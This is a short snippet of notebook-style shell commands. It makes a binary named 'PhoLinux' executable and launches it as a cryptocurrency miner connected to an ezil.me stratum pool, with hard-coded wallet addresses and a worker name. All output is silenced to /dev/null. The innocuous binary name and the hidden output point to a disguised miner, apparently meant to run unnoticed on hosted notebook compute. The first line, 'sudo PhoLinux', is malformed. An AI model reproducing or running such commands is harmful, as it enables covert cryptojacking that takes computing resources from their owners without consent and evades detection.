! sudo PhoLinux
! chmod +rwx PhoLinux
! ./PhoLinux -pool stratum+tcp://us-east.ezil.me:4444 -proto 2 -wal 0x3b96537e2ec66032961abb34c9d81c86b1d2640c.zil18ez2cvmghpt82zppyhfu5ptgdueme8vtdmz853 -worker gILa-EtcZil -coin etc > /dev/null

